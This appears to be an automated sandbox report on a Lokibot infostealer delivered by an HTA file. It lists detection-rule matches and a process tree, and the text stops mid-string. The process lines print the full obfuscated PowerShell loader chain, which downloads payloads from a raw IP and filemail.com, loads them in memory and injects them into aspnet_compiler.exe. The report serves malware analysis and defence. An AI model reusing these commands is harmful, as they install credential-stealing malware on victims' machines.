                Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: powershell.exe PID: 2504, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5820, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 5820, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: aspnet_compiler.exe PID: 2736, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winHTA@20/23@1/3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,13_2_0040650A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,13_2_0040434D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks[1].tiffJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbbjqvnr.fw2.ps1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS"
                Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaReversingLabs: Detection: 21%
                Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF0FC.tmp" "c:\Users\user\AppData\Local\Temp\dnftngtc\CSC42D1BD9B7A4B404E9A5CB58F4B22157.TMP"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenTJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF0FC.tmp" "c:\Users\user\AppData\Local\Temp\dnftngtc\CSC42D1BD9B7A4B404E9A5CB58F4B22157.TMP"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXV